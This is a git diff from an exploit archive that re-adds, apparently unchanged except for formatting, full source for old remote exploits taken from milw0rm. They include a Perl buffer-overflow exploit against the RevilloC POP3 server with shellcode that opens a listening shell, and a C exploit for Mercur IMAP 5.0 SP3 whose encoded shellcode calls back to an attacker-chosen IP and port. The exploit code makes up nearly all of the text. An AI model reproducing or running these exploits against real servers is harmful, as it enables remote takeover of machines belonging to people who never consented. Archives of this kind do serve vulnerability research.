'Content-Length: ' . length($content) . "\r\n" . + "Connection: close\r\n"; + } + + $response .= "\r\n" . 
$content; + + return $response; +} + +sub Chunk { + my ($self, $content) = @_; + + my $chunked; + while (length($content)) { + my $chunk = substr($content, 0, int(rand(10) + 1), ''); + $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; + } + $chunked .= "0\r\n\r\n"; + + return $chunked; +} + +sub Gzip { + my $self = shift; + my $data = shift; + my $comp = int(rand(5))+5; + + my($wtr, $rdr, $err); + + my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); + print $wtr $data; + close ($wtr); + local $/; + + return (<$rdr>); +} +1; + + +# milw0rm.com [2006-02-28] diff --git a/platforms/windows/remote/155.c b/platforms/windows/remote/155.c index 4949f743c..eea58e09b 100755 --- a/platforms/windows/remote/155.c +++ b/platforms/windows/remote/155.c @@ -227,6 +227,6 @@ url : http://www.coromputer.net mail : kralor@coromputer.net -\*============================\* www.coromputer.net */===========================*/ - -// milw0rm.com [2004-02-26] +\*============================\* www.coromputer.net */===========================*/ + +// milw0rm.com [2004-02-26] diff --git a/platforms/windows/remote/1565.pl b/platforms/windows/remote/1565.pl index 43db932b4..db66a8feb 100755 --- a/platforms/windows/remote/1565.pl +++ b/platforms/windows/remote/1565.pl 
@@ -1,76 +1,76 @@ -#!/usr/bin/perl -w -#revilloC mail server PoC exploit ( for xp sp1) -# Discovered securma massine from MorX Security Research Team (http://www.morx.org). -#RevilloC is a MailServer and Proxy v 1.21 (http://www.revilloC.com) -#The mail server is a central point for emails coming in and going out from home or office -#The service will work with any standard email client that supports POP3 and SMTP. -#by sending a large buffer after USER commands -#C:\>nc 127.0.0.1 110 -#+OK RevilloC POP3 Ready -#USER "A" x4081 + "\xff"x4 + "\xdd"x4 + "\x0d\x0a" (xp sp2) -#we have: -#access violation when reading [dddddddd]. -#ntdll!wcsncat+0x387: -#7C92B3FB 8B0B MOV ECX,DWORD PTR DS:[EBX] --->EBX pointe to "\xdd"x4 -#ECX dddddddd -#EAX FFFFFFFF -#Vendor contacted 14/01/2006 , No response,No patch. -#this entire document is for eductional, testing and demonstrating purpose only. -#greets all MorX members,undisputed,sara -#!/usr/bin/perl -w -use IO::Socket; - if ($#ARGV<0) - { - print "\n write the target IP!! \n\n"; - exit; - } - - $shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33". - "\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C". - "\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE". - "\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB". - "\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77". - "\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77". - "\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77". - "\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77". - "\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77". - "\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77". - "\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77". - "\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77". - "\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77". 
- "\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB". - "\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C". - "\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0". - "\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77". - "\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0". - "\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB". - "\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5". - "\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98". - "\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE". - "\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77". - "\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8". - "\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF". - "\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90". - "\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74". - "\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4". - "\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94". - "\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5". - "\xD3\x4A\x8C\x88"; - $buffer = "\x90"x3601; - $eax ="\x83\xb5\x19\x01"; # change if needed - $peb= "\x20\xf0\xfd\x7f"; #PEB lock - $user ="USER "; - $enter = "\x0d\x0a"; - $connect = IO::Socket::INET ->new (Proto=>"tcp", - PeerAddr=> "$ARGV[0]", - PeerPort=>"110"); unless ($connect) { die "cant connect" } - print "\nRevilloC mail server remote PoC exploit by securma massine\n"; - print "\nsecurma\@morx.org\n"; - print "\n+++++++++++www.morx.org++++++++++++++++\n"; - $connect->recv($text,128); - print "$text\n"; - print "[+] Sent USER\n"; - $connect->send($user . $buffer . $shellcode . $eax . $peb . 
$enter); - print "[+] Sent shellcode..telnet to victim host port 9191\n"; - -# milw0rm.com [2006-03-07] +#!/usr/bin/perl -w +#revilloC mail server PoC exploit ( for xp sp1) +# Discovered securma massine from MorX Security Research Team (http://www.morx.org). +#RevilloC is a MailServer and Proxy v 1.21 (http://www.revilloC.com) +#The mail server is a central point for emails coming in and going out from home or office +#The service will work with any standard email client that supports POP3 and SMTP. +#by sending a large buffer after USER commands +#C:\>nc 127.0.0.1 110 +#+OK RevilloC POP3 Ready +#USER "A" x4081 + "\xff"x4 + "\xdd"x4 + "\x0d\x0a" (xp sp2) +#we have: +#access violation when reading [dddddddd]. +#ntdll!wcsncat+0x387: +#7C92B3FB 8B0B MOV ECX,DWORD PTR DS:[EBX] --->EBX pointe to "\xdd"x4 +#ECX dddddddd +#EAX FFFFFFFF +#Vendor contacted 14/01/2006 , No response,No patch. +#this entire document is for eductional, testing and demonstrating purpose only. +#greets all MorX members,undisputed,sara +#!/usr/bin/perl -w +use IO::Socket; + if ($#ARGV<0) + { + print "\n write the target IP!! \n\n"; + exit; + } + + $shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33". + "\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C". + "\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE". + "\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB". + "\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77". + "\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77". + "\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77". + "\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77". + "\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77". + "\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77". + "\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77". + "\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77". 
+ "\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77". + "\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB". + "\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C". + "\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0". + "\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77". + "\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0". + "\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB". + "\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5". + "\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98". + "\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE". + "\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77". + "\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8". + "\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF". + "\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90". + "\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74". + "\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4". + "\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94". + "\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5". + "\xD3\x4A\x8C\x88"; + $buffer = "\x90"x3601; + $eax ="\x83\xb5\x19\x01"; # change if needed + $peb= "\x20\xf0\xfd\x7f"; #PEB lock + $user ="USER "; + $enter = "\x0d\x0a"; + $connect = IO::Socket::INET ->new (Proto=>"tcp", + PeerAddr=> "$ARGV[0]", + PeerPort=>"110"); unless ($connect) { die "cant connect" } + print "\nRevilloC mail server remote PoC exploit by securma massine\n"; + print "\nsecurma\@morx.org\n"; + print "\n+++++++++++www.morx.org++++++++++++++++\n"; + $connect->recv($text,128); + print "$text\n"; + print "[+] Sent USER\n"; + $connect->send($user . $buffer . $shellcode . $eax . $peb . $enter); + print "[+] Sent shellcode..telnet to victim host port 9191\n"; + +# milw0rm.com [2006-03-07] 
diff --git a/platforms/windows/remote/159.c b/platforms/windows/remote/159.c index 06d5db413..f0fbdc975 100755 --- a/platforms/windows/remote/159.c +++ b/platforms/windows/remote/159.c @@ -553,6 +553,6 @@ closesocket(s); return 0; } - - -// milw0rm.com [2004-02-29] + + +// milw0rm.com [2004-02-29] diff --git a/platforms/windows/remote/1592.c b/platforms/windows/remote/1592.c index 90e1e6f77..e3c5ab9de 100755 --- a/platforms/windows/remote/1592.c +++ b/platforms/windows/remote/1592.c 
@@ -1,306 +1,306 @@ -/* - * mercur.cpp - * - * Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit - * Copyright (C) 2006 Javaphile Group - * http://www.javaphile.org - * - * Exploits code by : pll Ellison.Tang[at]gmail[dot]com - * - * Bug Reference: - * http://www.frsirt.com/bulletins/4332 - * - */ - -#include -#include -#include -#include - -#pragma comment(lib, "ws2_32") - -SOCKET ConnectTo(char *ip, int port) -{ - WSADATA wsaData; - SOCKET s; - struct hostent *he; - struct sockaddr_in host; - int nTimeout=150000; - - if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0) - { - printf("[-]WSAStartup failed.\n"); - exit(-1); - } - - if((he=gethostbyname(ip))==0) - { - printf("[-]Failed to resolve '%s'.", ip); - exit(-1); - } - - host.sin_port=htons(port); - host.sin_family=AF_INET; - host.sin_addr=*((struct in_addr *)he->h_addr); - - if ((s=socket(AF_INET,SOCK_STREAM,0))<0) - { - printf("[-]Failed creating socket."); - exit(-1); - } - - if ((connect(s,(struct sockaddr *)&host,sizeof(host)))==-1) - { - closesocket(s); - printf("[-]Failed connecting to host.\n"); - exit(-1); - } - setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeout,sizeof(nTimeout)); - return s; -} - - -void Disconnect(SOCKET s) -{ - closesocket(s); - WSACleanup(); -} - -void PrintSc(unsigned char *sc, int len) -{ - int i,j; - char *p; - char msg[6]; - - //printf("/* %d bytes */\n", buffsize); - - // Print general shellcode - for(i = 0; i < len; i++) - { - if((i%16)==0) - { - if(i!=0) - printf("\"\n\""); - else - printf("\""); - } - - //printf("\\x%.2X", sc[i]); - - sprintf(msg, "\\x%.2X", sc[i] & 0xff); - - for( p = msg, j=0; j < 4; p++, j++ ) - { - if(isupper(*p)) - printf("%c", _tolower(*p)); - else - printf("%c", p[0]); - } - } - - printf("\";\n"); -} - -void main(int argc,char* argv[]) -{ - - struct OSTYPE - { - unsigned int ret; - char des[255]; - }; - - OSTYPE os[] = { - {0x7FFA4512, "CN Windows ALL 0x7FFA4512"}, - {0x7801f4fb, "Windows 2k SP4 0x7801f4fb"}, - {0xDDDDDDDD, 
"Debug"}, - {0, NULL} - }; - - unsigned char shellcode[]= - /* ip offset: 71 + 21 = 92 */ - /* port offset: 78 + 21 = 99 */ - /* 21 bytes decode */ - "\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05" - "\xe8\xed\xff\xff\xff" - /* 254 bytes shellcode, xor with 0xee */ - "\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65" - "\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee" - "\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b" - "\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef" - "\x84\xec\x11\xb8\xfe\x7d\x86" - "\x91\xee\xee\xef" //ip - "\x86" - "\xec\xee" - "\xee\xdb" //port - "\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84" - "\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45" - "\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf" - "\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11" - "\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0" - "\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b" - "\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05" - "\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65" - "\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11" - "\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37" - "\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97"; - - unsigned char FindSc[]= - "\x8B\xCC\x80\xE9\x3E\x8B\xF1\x33\xC0\x40\xC1\xE0\x0A\x04\x80\x8B" - "\xF8\x57\x33\xC9\xB1\x3E\xF3\xA4\x5F\xFF\xE7\x8B\xC7\x04\x28\x50" - "\x33\xC0\x50\x64\x89\x20\xBA\x41\x47\x4F\x55\x33\xFF\x3B\x17\x74" - "\x03\x47\xEB\xF9\x83\xC7\x04\x3B\x17\x74\x03\x47\xEB\xEF\x83\xC7" - "\x04\x57\xC3\x8B\x54\x24\x0C\x33\xC0\xB4\x10\x33\xDB\xB3\x9C\x01" - "\x04\x13\x33\xC0\xC3" - "\x90\x90\x90\x90" - "\xEB\xA5"; - - - if(argc < 5) - { - printf("Mercur IMAPD 5.0 SP3 Remote Exploit\n"); - printf("-------------------------------------------\n"); - 
printf("Usage:\n"); - printf(" %s \n", argv[0]); - printf("\nType could be:\n"); - - int i=0; - while(os[i].ret) - { - printf(" [%d] %s\n", i, os[i].des); - i++; - } - return; - } - - SOCKET s=ConnectTo(argv[1],143); - - printf("[+]Connected to target..."); - - char szRecvBuff[600] = {0}; - - if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0) - { - printf("failed!\n"); - return; - } - else - { - printf("done!\n"); - } - -// printf("%s\n",szRecvBuff); - - if(strstr(szRecvBuff, "MERCUR") == NULL) - { - printf("[-]Seems not IMAP running.\n"); - printf("Quiting..."); - return; - } - else - { - printf("[*]Seems IMAP running.\n"); - } - - unsigned long dwCbIp=inet_addr(argv[2]); - - unsigned short q=(unsigned short)atoi(argv[3]); - unsigned short dwCbPort=(unsigned short)q; - - dwCbIp=dwCbIp^0xEEEEEEEE; - dwCbPort=dwCbPort^0xEEEE; - - shellcode[92] =(char) (dwCbIp & 0x000000FF); - shellcode[93] =(char) ((dwCbIp & 0x0000FF00)>>8); - shellcode[94] =(char) ((dwCbIp & 0x00FF0000)>>16); - shellcode[95] =(char) ((dwCbIp & 0xFF000000)>>24); - - shellcode[99] =(char) ((dwCbPort & 0x0000FF00)>>8); - shellcode[100] =(char) (dwCbPort & 0x000000FF); - - char szUserName[20]={0}; - printf("[?]Username:"); - gets(szUserName); - - char szPassWord[20]={0}; - printf("[?]Passwd:"); - gets(szPassWord); - - char szLogin[]=" login "; - char szLoginInfo[50]={0}; - unsigned char szSpace=0x20; - char szEnd[]="\r\n"; - - memcpy(szLoginInfo,szUserName,lstrlen(szUserName)); - int dwLen=lstrlen(szUserName); - memcpy(szLoginInfo+dwLen,szLogin,lstrlen(szLogin)); - dwLen+=lstrlen(szLogin); - memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord)); - dwLen+=lstrlen(szPassWord); - memcpy(szLoginInfo+dwLen,&szSpace,1); - dwLen++; - memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord)); - dwLen+=lstrlen(szPassWord); - memcpy(szLoginInfo+dwLen,szEnd,lstrlen(szEnd)); - -// printf("%s\n",szLoginInfo); - - printf("[+]Sending Login Info..."); - - send(s,szLoginInfo,lstrlen(szLoginInfo),0); - - 
if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0) - { - printf("failed!\n"); - return; - } - else - { - printf("done!\n"); - } - -// printf("%s\n",szRecvBuff); - - if(strstr(szRecvBuff, "OK") == NULL) - { - printf("[-]Seems not a valid user or not support IMAP.\n"); - printf("Quiting..."); - return; - } - else - { - printf("[*]Seems a valid user.\n"); - } - - char szSelect[]=" select "; - char szMagicData[1000]={0}; - - memset(szMagicData,'A',sizeof(szMagicData)-1); - memcpy(szMagicData,szUserName,lstrlen(szUserName)); - memcpy(szMagicData+lstrlen(szUserName),szSelect,sizeof szSelect-1); - - int p=atoi(argv[4]); - *(unsigned int *)&FindSc[85] = os[p].ret; - - memcpy(szMagicData+251-sizeof FindSc+1,FindSc,sizeof FindSc-1); - - memcpy(szMagicData+251,szEnd,sizeof szEnd-1); - - char szAdog[]="AGOU"; - memcpy(szMagicData+253,szAdog,sizeof szAdog-1); - memcpy(szMagicData+257,szAdog,sizeof szAdog-1); - memcpy(szMagicData+261,shellcode,sizeof shellcode-1); - - memcpy(szMagicData+sizeof szMagicData-sizeof szEnd,szEnd,sizeof szEnd-1); - - printf("[+]Sending Magic Data To server...Good Luck!\n"); - send(s,szMagicData,sizeof szMagicData-1,0); - - recv(s,szRecvBuff,sizeof(szRecvBuff),0); - printf("%s\n",szRecvBuff); - - Disconnect(s); - printf("[?]Sending finished...Good luck!\n"); -} - -// milw0rm.com [2006-03-19] +/* + * mercur.cpp + * + * Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit + * Copyright (C) 2006 Javaphile Group + * http://www.javaphile.org + * + * Exploits code by : pll Ellison.Tang[at]gmail[dot]com + * + * Bug Reference: + * http://www.frsirt.com/bulletins/4332 + * + */ + +#include +#include +#include +#include + +#pragma comment(lib, "ws2_32") + +SOCKET ConnectTo(char *ip, int port) +{ + WSADATA wsaData; + SOCKET s; + struct hostent *he; + struct sockaddr_in host; + int nTimeout=150000; + + if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0) + { + printf("[-]WSAStartup failed.\n"); + exit(-1); + } + + if((he=gethostbyname(ip))==0) + { + 
printf("[-]Failed to resolve '%s'.", ip); + exit(-1); + } + + host.sin_port=htons(port); + host.sin_family=AF_INET; + host.sin_addr=*((struct in_addr *)he->h_addr); + + if ((s=socket(AF_INET,SOCK_STREAM,0))<0) + { + printf("[-]Failed creating socket."); + exit(-1); + } + + if ((connect(s,(struct sockaddr *)&host,sizeof(host)))==-1) + { + closesocket(s); + printf("[-]Failed connecting to host.\n"); + exit(-1); + } + setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeout,sizeof(nTimeout)); + return s; +} + + +void Disconnect(SOCKET s) +{ + closesocket(s); + WSACleanup(); +} + +void PrintSc(unsigned char *sc, int len) +{ + int i,j; + char *p; + char msg[6]; + + //printf("/* %d bytes */\n", buffsize); + + // Print general shellcode + for(i = 0; i < len; i++) + { + if((i%16)==0) + { + if(i!=0) + printf("\"\n\""); + else + printf("\""); + } + + //printf("\\x%.2X", sc[i]); + + sprintf(msg, "\\x%.2X", sc[i] & 0xff); + + for( p = msg, j=0; j < 4; p++, j++ ) + { + if(isupper(*p)) + printf("%c", _tolower(*p)); + else + printf("%c", p[0]); + } + } + + printf("\";\n"); +} + +void main(int argc,char* argv[]) +{ + + struct OSTYPE + { + unsigned int ret; + char des[255]; + }; + + OSTYPE os[] = { + {0x7FFA4512, "CN Windows ALL 0x7FFA4512"}, + {0x7801f4fb, "Windows 2k SP4 0x7801f4fb"}, + {0xDDDDDDDD, "Debug"}, + {0, NULL} + }; + + unsigned char shellcode[]= + /* ip offset: 71 + 21 = 92 */ + /* port offset: 78 + 21 = 99 */ + /* 21 bytes decode */ + "\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05" + "\xe8\xed\xff\xff\xff" + /* 254 bytes shellcode, xor with 0xee */ + "\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65" + "\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee" + "\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b" + "\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef" + "\x84\xec\x11\xb8\xfe\x7d\x86" + "\x91\xee\xee\xef" //ip + "\x86" + "\xec\xee" + "\xee\xdb" //port + 
"\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84" + "\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45" + "\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf" + "\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11" + "\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0" + "\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b" + "\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05" + "\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65" + "\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11" + "\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37" + "\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97"; + + unsigned char FindSc[]= + "\x8B\xCC\x80\xE9\x3E\x8B\xF1\x33\xC0\x40\xC1\xE0\x0A\x04\x80\x8B" + "\xF8\x57\x33\xC9\xB1\x3E\xF3\xA4\x5F\xFF\xE7\x8B\xC7\x04\x28\x50" + "\x33\xC0\x50\x64\x89\x20\xBA\x41\x47\x4F\x55\x33\xFF\x3B\x17\x74" + "\x03\x47\xEB\xF9\x83\xC7\x04\x3B\x17\x74\x03\x47\xEB\xEF\x83\xC7" + "\x04\x57\xC3\x8B\x54\x24\x0C\x33\xC0\xB4\x10\x33\xDB\xB3\x9C\x01" + "\x04\x13\x33\xC0\xC3" + "\x90\x90\x90\x90" + "\xEB\xA5"; + + + if(argc < 5) + { + printf("Mercur IMAPD 5.0 SP3 Remote Exploit\n"); + printf("-------------------------------------------\n"); + printf("Usage:\n"); + printf(" %s \n", argv[0]); + printf("\nType could be:\n"); + + int i=0; + while(os[i].ret) + { + printf(" [%d] %s\n", i, os[i].des); + i++; + } + return; + } + + SOCKET s=ConnectTo(argv[1],143); + + printf("[+]Connected to target..."); + + char szRecvBuff[600] = {0}; + + if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0) + { + printf("failed!\n"); + return; + } + else + { + printf("done!\n"); + } + +// printf("%s\n",szRecvBuff); + + if(strstr(szRecvBuff, "MERCUR") == NULL) + { + printf("[-]Seems not IMAP running.\n"); + printf("Quiting..."); + return; + } + else + { + printf("[*]Seems IMAP running.\n"); + } + + unsigned long dwCbIp=inet_addr(argv[2]); + + 
unsigned short q=(unsigned short)atoi(argv[3]); + unsigned short dwCbPort=(unsigned short)q; + + dwCbIp=dwCbIp^0xEEEEEEEE; + dwCbPort=dwCbPort^0xEEEE; + + shellcode[92] =(char) (dwCbIp & 0x000000FF); + shellcode[93] =(char) ((dwCbIp & 0x0000FF00)>>8); + shellcode[94] =(char) ((dwCbIp & 0x00FF0000)>>16); + shellcode[95] =(char) ((dwCbIp & 0xFF000000)>>24); + + shellcode[99] =(char) ((dwCbPort & 0x0000FF00)>>8); + shellcode[100] =(char) (dwCbPort & 0x000000FF); + + char szUserName[20]={0}; + printf("[?]Username:"); + gets(szUserName); + + char szPassWord[20]={0}; + printf("[?]Passwd:"); + gets(szPassWord); + + char szLogin[]=" login "; + char szLoginInfo[50]={0}; + unsigned char szSpace=0x20; + char szEnd[]="\r\n"; + + memcpy(szLoginInfo,szUserName,lstrlen(szUserName)); + int dwLen=lstrlen(szUserName); + memcpy(szLoginInfo+dwLen,szLogin,lstrlen(szLogin)); + dwLen+=lstrlen(szLogin); + memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord)); + dwLen+=lstrlen(szPassWord); + memcpy(szLoginInfo+dwLen,&szSpace,1); + dwLen++; + memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord)); + dwLen+=lstrlen(szPassWord); + memcpy(szLoginInfo+dwLen,szEnd,lstrlen(szEnd)); + +// printf("%s\n",szLoginInfo); + + printf("[+]Sending Login Info..."); + + send(s,szLoginInfo,lstrlen(szLoginInfo),0); + + if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0) + { + printf("failed!\n"); + return; + } + else + { + printf("done!\n"); + } + +// printf("%s\n",szRecvBuff); + + if(strstr(szRecvBuff, "OK") == NULL) + { + printf("[-]Seems not a valid user or not support IMAP.\n"); + printf("Quiting..."); + return; + } + else + { + printf("[*]Seems a valid user.\n"); + } + + char szSelect[]=" select "; + char szMagicData[1000]={0}; + + memset(szMagicData,'A',sizeof(szMagicData)-1); + memcpy(szMagicData,szUserName,lstrlen(szUserName)); + memcpy(szMagicData+lstrlen(szUserName),szSelect,sizeof szSelect-1); + + int p=atoi(argv[4]); + *(unsigned int *)&FindSc[85] = os[p].ret; + + memcpy(szMagicData+251-sizeof 
